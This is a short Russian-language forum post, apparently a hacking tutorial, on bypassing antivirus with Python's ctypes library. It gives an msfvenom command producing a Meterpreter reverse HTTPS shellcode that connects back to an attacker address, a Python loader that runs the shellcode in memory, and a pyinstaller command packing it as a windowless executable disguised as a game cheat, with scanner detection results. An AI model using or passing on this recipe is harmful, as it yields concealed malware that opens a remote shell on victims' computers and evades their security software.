Обход антивируса с помощью ctypes(python)
@webwareПривет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1)Создаем шеллкод командой:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.
Дальше создаем скрипт на питоне следуещого вида:
from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");
tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))
shell()


Собираем через pyinstaller на Windows системе..
C:\Python27\Scripts\pyinstaller.exe -F --noconsole --onefile --icon=C:\Users\CorpOfHack\Desktop\contacts.ico C:\Users\CorpOfHack\Desktop\SuperCheat.py

Хочу заметить что когда я не использовал картинку мне показало на https://nodistribute.com/ 0/35
а когда добавил иконку то 8/35. Почему пока не выяснял.

А вот с картинкой
Ну в любом случае результат не плохой) Все спасибо за внимания.Надеюсь был полезен)